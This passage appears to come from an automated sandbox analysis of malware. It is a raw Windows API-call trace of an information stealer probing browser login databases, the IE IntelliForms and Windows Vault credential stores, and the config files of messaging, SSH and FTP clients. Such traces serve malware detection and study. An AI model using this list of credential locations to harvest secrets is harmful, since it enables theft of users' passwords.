Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 116 [0111.978] GetProcessHeap () returned 0x5b0000 [0111.979] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xec) returned 0x5cbf18 [0111.979] GetProcessHeap () returned 0x5b0000 [0111.979] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.980] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.980] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0111.980] GetProcessHeap () returned 0x5b0000 [0111.981] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf18 | out: hHeap=0x5b0000) returned 1 [0111.981] GetProcessHeap () returned 0x5b0000 [0111.981] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f90 [0111.982] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.983] wvsprintfW (in: param_1=0x5c7f90, param_2="%s%s\\Login Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 99 [0111.983] GetProcessHeap () returned 0x5b0000 [0111.983] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xca) returned 0x5cbef8 [0111.983] GetProcessHeap () returned 0x5b0000 [0111.983] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.984] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.984] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0111.985] GetProcessHeap () returned 0x5b0000 [0111.985] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbef8 | out: hHeap=0x5b0000) returned 1 [0111.985] GetProcessHeap () returned 0x5b0000 [0111.985] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f90 [0111.986] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.987] wvsprintfW (in: param_1=0x5c7f90, param_2="%s%s\\Default\\Login Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 107 [0111.987] GetProcessHeap () returned 0x5b0000 [0111.987] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xda) returned 0x5cbf08 [0111.987] GetProcessHeap () returned 0x5b0000 [0111.987] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.990] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.991] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0111.991] GetProcessHeap () returned 0x5b0000 [0111.991] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf08 | out: hHeap=0x5b0000) returned 1 [0111.991] GetProcessHeap () returned 0x5b0000 [0111.991] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f84) returned 0x5c7f90 [0111.992] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.992] wvsprintfW (in: param_1=0x5c7f90, param_2="%s\\%s\\User Data\\Default\\Login Data", arglist=0xdf9f0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 119 [0111.993] GetProcessHeap () returned 0x5b0000 [0111.993] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xf2) returned 0x5cbf20 [0111.993] GetProcessHeap () returned 0x5b0000 [0111.993] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.993] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.994] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Login Data") returned 0 [0111.994] GetProcessHeap () returned 0x5b0000 [0111.994] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf20 | out: hHeap=0x5b0000) returned 1 [0111.994] GetProcessHeap () returned 0x5b0000 [0111.994] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f80) returned 0x5c7f90 [0111.995] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.996] wvsprintfW (in: param_1=0x5c7f90, param_2="%s\\%s\\User Data\\Default\\Web Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 117 [0111.996] GetProcessHeap () returned 0x5b0000 [0111.996] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xee) returned 0x5cbf18 [0111.996] GetProcessHeap () returned 0x5b0000 [0111.997] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0111.997] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0111.998] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\User Data\\Default\\Web Data") returned 0 [0111.998] GetProcessHeap () returned 0x5b0000 [0111.998] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf18 | out: hHeap=0x5b0000) returned 1 [0111.998] GetProcessHeap () returned 0x5b0000 [0111.998] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5e) returned 0x5c7f90 [0111.999] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0111.999] wvsprintfW (in: param_1=0x5c7f90, param_2="%s%s\\Login Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 100 [0111.999] GetProcessHeap () returned 0x5b0000 [0111.999] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xcc) returned 0x5cbef8 [0111.999] GetProcessHeap () returned 0x5b0000 [0112.000] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0112.001] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0112.001] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Login Data") returned 0 [0112.001] GetProcessHeap () returned 0x5b0000 [0112.001] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbef8 | out: hHeap=0x5b0000) returned 1 [0112.001] GetProcessHeap () returned 0x5b0000 [0112.002] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5c7f90 [0112.002] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0112.003] wvsprintfW (in: param_1=0x5c7f90, param_2="%s%s\\Default\\Login Data", arglist=0xdf9ec | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 108 [0112.003] GetProcessHeap () returned 0x5b0000 [0112.003] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xdc) returned 0x5cbf08 [0112.003] GetProcessHeap () returned 0x5b0000 [0112.003] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0112.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0112.005] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Fenrir Inc\\Sleipnir5\\setting\\modules\\ChromiumViewer\\Default\\Login Data") returned 0 [0112.005] GetProcessHeap () returned 0x5b0000 [0112.005] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cbf08 | out: hHeap=0x5b0000) returned 1 [0112.005] GetProcessHeap () returned 0x5b0000 [0112.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5c7f90 [0112.005] GetProcessHeap () returned 0x5b0000 [0112.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc0c8 [0112.005] GetProcessHeap () returned 0x5b0000 [0112.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5c4bb8 [0112.006] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0112.007] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\QtWeb.NET\\QtWeb Internet Browser\\AutoComplete", phkResult=0x5c4bb8 | out: phkResult=0x5c4bb8*=0x0) returned 0x2 [0112.007] GetProcessHeap () returned 0x5b0000 [0112.007] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c4bb8 | out: hHeap=0x5b0000) returned 1 [0112.007] GetProcessHeap () returned 0x5b0000 [0112.007] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0112.007] GetProcessHeap () returned 0x5b0000 [0112.007] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc0c8 | out: hHeap=0x5b0000) returned 1 [0112.007] GetProcessHeap () returned 0x5b0000 [0112.007] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c7f90 [0112.008] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0112.008] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x5c7f90 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0112.008] GetProcessHeap () returned 0x5b0000 [0112.008] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f94) returned 0x5c81a0 [0112.009] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0112.009] wvsprintfW (in: param_1=0x5c81a0, param_2="%s\\QupZilla\\profiles\\default\\browsedata.db", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 75 [0112.009] GetProcessHeap () returned 0x5b0000 [0112.009] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x9a) returned 0x5ba8d8 [0112.010] GetProcessHeap () returned 0x5b0000 [0112.010] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c81a0 | out: hHeap=0x5b0000) returned 1 [0112.012] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0112.012] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\QupZilla\\profiles\\default\\browsedata.db") returned 0 [0112.012] GetProcessHeap () returned 0x5b0000 [0112.013] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ba8d8 | out: hHeap=0x5b0000) returned 1 [0112.013] GetProcessHeap () returned 0x5b0000 [0112.013] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c7f90 | out: hHeap=0x5b0000) returned 1 [0112.033] LoadLibraryW (lpLibFileName="vaultcli.dll") returned 0x6fc00000 [0113.605] GetProcAddress (hModule=0x6fc00000, lpProcName="VaultEnumerateItems") returned 0x6fc0b960 [0113.606] GetProcAddress (hModule=0x6fc00000, lpProcName="VaultEnumerateVaults") returned 0x6fc23510 [0113.607] GetProcAddress (hModule=0x6fc00000, lpProcName="VaultFree") returned 0x6fc17050 [0113.607] GetProcAddress (hModule=0x6fc00000, lpProcName="VaultGetItem") returned 0x6fc0bb70 [0113.608] GetProcAddress (hModule=0x6fc00000, lpProcName="VaultGetItem") returned 0x6fc0bb70 [0113.609] GetProcAddress (hModule=0x6fc00000, lpProcName="VaultOpenVault") returned 0x6fc0bc10 [0113.610] GetProcAddress (hModule=0x6fc00000, lpProcName="VaultCloseVault") returned 0x6fc0bc90 [0113.611] GetVersionExW (in: lpVersionInformation=0xdfa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa5891574, dwMinorVersion=0xdfb5c, dwBuildNumber=0x0, dwPlatformId=0x408323, szCSDVersion="눈[쾓眠") | out: lpVersionInformation=0xdfa80*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0113.611] VaultEnumerateVaults () returned 0x0 [0113.657] GetProcessHeap () returned 0x5b0000 [0113.657] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5caa90 [0113.657] GetProcessHeap () returned 0x5b0000 [0113.657] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc2c0 [0113.657] VaultOpenVault () returned 0x0 [0113.658] VaultEnumerateItems () returned 0x0 [0113.659] VaultFree () returned 0x0 [0113.659] VaultCloseVault () returned 0x6 [0113.675] VaultOpenVault () returned 0x0 [0113.676] VaultEnumerateItems () returned 0x0 [0113.683] VaultFree () returned 0x0 [0113.683] VaultCloseVault () returned 0x6 [0113.700] GetProcessHeap () returned 0x5b0000 [0113.701] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa90 | out: hHeap=0x5b0000) returned 1 [0113.702] GetProcessHeap () returned 0x5b0000 [0113.702] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc2c0 | out: hHeap=0x5b0000) returned 1 [0113.702] GetProcessHeap () returned 0x5b0000 [0113.702] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3e8) returned 0x5caa90 [0113.702] GetProcessHeap () returned 0x5b0000 [0113.702] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc) returned 0x5bc128 [0113.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0113.712] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\IntelliForms\\Storage2", phkResult=0xdfbb8 | out: phkResult=0xdfbb8*=0x0) returned 0x2 [0113.712] GetProcessHeap () returned 0x5b0000 [0113.715] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa90 | out: hHeap=0x5b0000) returned 1 [0113.738] GetProcessHeap () returned 0x5b0000 [0113.738] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5bc128 | out: hHeap=0x5b0000) returned 1 [0113.781] GetProcessHeap () returned 0x5b0000 [0113.782] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0113.782] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0113.783] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0113.783] GetProcessHeap () returned 0x5b0000 [0113.783] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f50) returned 0x5cb528 [0113.784] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.785] wvsprintfW (in: param_1=0x5cb528, param_2="%s\\Opera", arglist=0xdfb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 43 [0113.785] GetProcessHeap () returned 0x5b0000 [0113.785] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5a) returned 0x5c95a0 [0113.785] GetProcessHeap () returned 0x5b0000 [0113.786] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb528 | out: hHeap=0x5b0000) returned 1 [0113.786] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.786] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Opera") returned 0 [0113.787] GetProcessHeap () returned 0x5b0000 [0113.787] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0113.787] GetProcessHeap () returned 0x5b0000 [0113.788] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c95a0 | out: hHeap=0x5b0000) returned 1 [0113.788] GetProcessHeap () returned 0x5b0000 [0113.788] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb528 [0113.788] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.789] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox86", pszValue="RootDir", pdwType=0x0, pvData=0x5cb528, pcbData=0xdfba4*=0x104 | out: pdwType=0x0, pvData=0x5cb528, pcbData=0xdfba4*=0x104) returned 0x2 [0113.789] GetProcessHeap () returned 0x5b0000 [0113.790] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb528 | out: hHeap=0x5b0000) returned 1 [0113.790] GetProcessHeap () returned 0x5b0000 [0113.790] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb528 [0113.791] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.791] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\8pecxstudios\\Cyberfox", pszValue="Path", pdwType=0x0, pvData=0x5cb528, pcbData=0xdfba4*=0x104 | out: pdwType=0x0, pvData=0x5cb528, pcbData=0xdfba4*=0x104) returned 0x2 [0113.791] GetProcessHeap () returned 0x5b0000 [0113.791] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb528 | out: hHeap=0x5b0000) returned 1 [0113.791] GetProcessHeap () returned 0x5b0000 [0113.791] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb528 [0113.792] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.792] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Pale Moon", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5cb528, pcbData=0xdfba4*=0x104 | out: pdwType=0x0, pvData=0x5cb528, pcbData=0xdfba4*=0x104) returned 0x2 [0113.792] GetProcessHeap () returned 0x5b0000 [0113.793] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb528 | out: hHeap=0x5b0000) returned 1 [0113.793] GetProcessHeap () returned 0x5b0000 [0113.793] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cb528 [0113.793] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.794] SHGetValueW (in: hkey=0x80000002, pszSubKey="SOFTWARE\\Mozilla\\Waterfox", pszValue="CurrentVersion", pdwType=0x0, pvData=0x5cb528, pcbData=0xdfb90*=0x104 | out: pdwType=0x0, pvData=0x5cb528, pcbData=0xdfb90*=0x104) returned 0x2 [0113.794] GetProcessHeap () returned 0x5b0000 [0113.794] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb528 | out: hHeap=0x5b0000) returned 1 [0113.857] GetProcessHeap () returned 0x5b0000 [0113.857] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5cb528 [0113.858] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.858] wvsprintfW (in: param_1=0x5cb528, param_2="%s\\.purple\\accounts.xml", arglist=0xdfb60 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 58 [0113.858] GetProcessHeap () returned 0x5b0000 [0113.859] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x78) returned 0x5c6d10 [0113.859] GetProcessHeap () returned 0x5b0000 [0113.859] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb528 | out: hHeap=0x5b0000) returned 1 [0113.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.860] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\.purple\\accounts.xml") returned 0 [0113.860] GetProcessHeap () returned 0x5b0000 [0113.860] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6d10 | out: hHeap=0x5b0000) returned 1 [0113.875] GetProcessHeap () returned 0x5b0000 [0113.875] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0113.876] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0113.877] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents") returned 0x0 [0113.878] GetProcessHeap () returned 0x5b0000 [0113.878] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f5a) returned 0x5cb930 [0113.879] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.879] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\SuperPutty", arglist=0xdfb94 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 42 [0113.879] GetProcessHeap () returned 0x5b0000 [0113.879] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x58) returned 0x5caae8 [0113.880] GetProcessHeap () returned 0x5b0000 [0113.880] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0113.881] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.881] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\Documents\\SuperPutty") returned 0 [0113.881] GetProcessHeap () returned 0x5b0000 [0113.881] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0113.881] GetProcessHeap () returned 0x5b0000 [0113.882] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0113.934] GetProcessHeap () returned 0x5b0000 [0113.934] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0113.934] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0113.935] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0113.935] GetProcessHeap () returned 0x5b0000 [0113.935] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f70) returned 0x5cb930 [0113.936] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.936] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FTPShell\\ftpshell.fsi", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 44 [0113.936] GetProcessHeap () returned 0x5b0000 [0113.936] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x5c) returned 0x5caae8 [0113.936] GetProcessHeap () returned 0x5b0000 [0113.937] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0113.937] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.938] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPShell\\ftpshell.fsi") returned 0 [0113.938] GetProcessHeap () returned 0x5b0000 [0113.938] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0113.938] GetProcessHeap () returned 0x5b0000 [0113.939] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0113.939] GetProcessHeap () returned 0x5b0000 [0113.939] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f9a) returned 0x5cb930 [0113.940] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.941] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 80 [0113.941] GetProcessHeap () returned 0x5b0000 [0113.941] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xa4) returned 0x5c9390 [0113.941] GetProcessHeap () returned 0x5b0000 [0113.941] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0113.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.942] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Notepad++\\plugins\\config\\NppFTP\\NppFTP.xml") returned 0 [0113.943] GetProcessHeap () returned 0x5b0000 [0113.943] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0113.943] GetProcessHeap () returned 0x5b0000 [0113.943] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x208) returned 0x5c9390 [0113.944] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74eb0000 [0113.944] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x5c9390 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0113.945] GetProcessHeap () returned 0x5b0000 [0113.945] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f74) returned 0x5cb930 [0113.945] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.946] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\oZone3D\\MyFTP\\myftp.ini", arglist=0xdfba0 | out: param_1="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 46 [0113.946] GetProcessHeap () returned 0x5b0000 [0113.946] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x60) returned 0x5caae8 [0113.946] GetProcessHeap () returned 0x5b0000 [0113.947] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0113.948] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.948] PathFileExistsW (pszPath="C:\\Program Files (x86)\\oZone3D\\MyFTP\\myftp.ini") returned 0 [0113.948] GetProcessHeap () returned 0x5b0000 [0113.948] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caae8 | out: hHeap=0x5b0000) returned 1 [0113.949] GetProcessHeap () returned 0x5b0000 [0113.949] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0113.949] GetProcessHeap () returned 0x5b0000 [0113.949] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f6e) returned 0x5cb930 [0113.950] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0113.951] wvsprintfW (in: param_1=0x5cb930, param_2="%s\\FTPBox\\profiles.conf", arglist=0xdfba0 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 58 [0113.951] GetProcessHeap () returned 0x5b0000 [0113.951] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x78) returned 0x5c6d10 [0113.951] GetProcessHeap () returned 0x5b0000 [0113.951] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cb930 | out: hHeap=0x5b0000) returned 1 [0113.952] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0113.952] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPBox\\profiles.conf") returned 0 [0113.953] GetProcessHeap () returned 0x5b0000 [0113.953] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c6d10 | out: hHeap=0x5b0000) returned 1 [0113.953] GetProcessHeap () returned 0x5b0000 